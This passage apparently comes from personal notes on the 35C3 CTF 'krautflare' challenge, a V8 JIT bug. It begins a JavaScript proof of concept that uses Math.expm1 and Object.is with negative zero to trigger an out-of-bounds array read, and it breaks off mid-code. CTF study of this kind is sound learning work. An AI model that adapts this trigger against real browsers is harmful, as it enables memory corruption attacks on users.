0x00 Overview This is some of my notes about krautflare challenge in 35C3 CTF, and is not a complete write-up for this challenge. For a complete write-up, please read this and this. This is also a complete exploit. I will discuss some of problems I encountered and how I solved them when I was working on this challenge. PoC Here is the working PoC that can triggers OOB read. function f(v) { const arr = [1.1, 2.2, 3.3]; const o = {z1: -0} let res = Object.is(Math.expm1(v), o.z1); return arr[re...